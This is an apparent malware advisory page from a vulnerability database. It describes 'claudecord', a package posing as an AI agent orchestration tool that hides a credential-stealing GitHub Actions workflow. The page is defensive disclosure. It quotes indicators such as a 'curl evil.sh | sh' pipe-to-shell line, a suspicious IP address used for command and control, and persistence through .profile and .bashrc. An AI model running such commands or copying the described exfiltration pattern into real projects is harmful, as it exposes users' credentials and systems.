VDB

GCVE-110-OSM-2026-13425

GCVE-110-OSM-2026-13425
Advisory PublishedCVSS 8.8/10
Vulnetix · Advisory published October 8, 2026
This package is designed to look like a AI agent orchestration tool, but really this repository/package snapshot contains a malicious GitHub Actions CI workflow designed to steal deployment, SSH, npm, and PyPI credentials. It also creates a credible path for publishing trojanized future releases and compromising the deployment server. Published by PERSISTENCE - Startup Persistence in .github/workflows/load.yml: ".profile" - Startup Persistence in testdata/conformance/safe_name.json: ".bashrc" DESTINATION - 4 exfil (custom-c2, awsAccessKeys, githubTokens) - 11 c2 (ipv4, urls, domains) (values recorded in verified_iocs) EXFIL - Git Configuration Access in .github/workflows/release-start.yml: "git config user.name" - Data Encoding for Exfiltration in src/server/web/app.js: "encodeURIComponent(project) + "&limit=60&latest=1").then(showHistory" - Curl/Wget Pipe to Shell in testdata/conformance/quote_body.json: "curl evil.sh | sh" - Suspicious Domain in .github/workflows/github_actions_security.yml: "http://193.32.204.199" - System Information Collection in scripts/npm/bin/claudecord.js: "process.platform" OBFUSCATION - Base64 Encoded Payload in testdata/conformance/project_slug.json: ""aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa..." ADDITIONAL FINDINGS - Shell Command Execution in scripts/cost/benchmark.py: "subprocess.run(" - Brand New Package PAYLOAD FILES scripts/npm/bin/claudecord.js (+ .github/workflows/release-start.yml, src/server/web/app.js)

Weaknesses (CWE)

CWE-506Embedded Malicious Code

Risk Scores

CVSS 3.1
8.8/10
High · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Affected Products

VendorProductVersionsPlatforms
unknownclaudecordall (affected)—

References

vendor

Browse GCVE Records

3,328 records in the GCVE database · Updated October 10, 2026

No matching records found.

Explore Further

Investigate this vulnerability in the interactive console or download the raw GCVE record.

$ Console Community · 100/wk Open console ›